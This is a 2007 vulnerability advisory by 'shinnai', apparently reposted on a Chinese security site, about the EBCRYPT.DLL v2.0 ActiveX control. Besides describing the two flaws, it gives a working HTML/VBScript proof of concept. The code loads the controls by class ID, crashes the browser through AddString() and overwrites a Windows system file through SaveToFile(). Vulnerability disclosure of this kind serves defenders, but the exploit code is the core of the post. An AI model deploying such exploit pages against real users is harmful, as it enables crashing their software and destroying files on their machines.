|
EB Design Pty Ltd (EBCRYPT.DLL v.2.0) Multiple Remote Vulnerabilites
|
|
来源:http://shinnai.altervista.org 作者:shinnai 发布时间:2007-09-25
|
|
<pre>
<code><span style="font: 10pt Courier New;"><span class="general1-symbol"><body bgcolor="#E0E0E0">-----------------------------------------------------------------------------
<b>EB Design Pty Ltd (EBCRYPT.DLL v.2.0) Multiple Remote Vulnerabilites</b>
url: http://www.ebcrypt.com/
Author: shinnai
mail: shinnai[at]autistici[dot]org
site: http://shinnai.altervista.org
<b><font color='red'>This was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.</font></b>
Tested on Windows XP Professional SP2 all patched, with Internet Explorer 7
<b>Marked as:
RegKey Safe for Script: False
RegKey Safe for Init: False
Implements IObjectSafety: True
IDisp Safe: Safe for untrusted: caller, data
KillBitSet: False</b>
This control contains two vulnerabilities:
1) It is possible to cause a DoS passing at least one character to
"AddString()" method. This is a dump of exception:
Access violation when reading [3A433B2E]
03158CA4 FF51 10 => CALL DWORD PTR DS:[ECX+10] <-- crash
ECX 3A433B2E <-- ".;C:" (is a part of path)
2) It is possible to overwrite a file passed as argument to "SaveToFile()"
method
-----------------------------------------------------------------------------
<object classid='clsid:3C34EAC7-9904-4415-BBE4-82AA8C0C0BE8' id='test1'></object>
<object classid='clsid:B1E7505E-BBFD-42BF-98C9-602205A1504C' id='test2'></object>
<input language=VBScript onclick=tryAddString() type=button value='Click here to start AddString test '>
<input language=VBScript onclick=trySaveToFile() type=button value='Click here to start SaveToFile test'>
<script language='vbscript'>
Sub tryAddString
test1.AddString "A"
End Sub
Sub trySaveToFile
test2.SaveToFile "C:\WINDOWS\system_.ini"
MsgBox "Exploit completed."
End Sub
</script>
</span></span>
</code></pre>
|
| |
|
[ 推荐]
[ 评论(0条)]
[返回顶部] [打印本页]
[关闭窗口] |
|
|
| |
|
|
 |
|
推荐广告 |
|
|
|
|
|
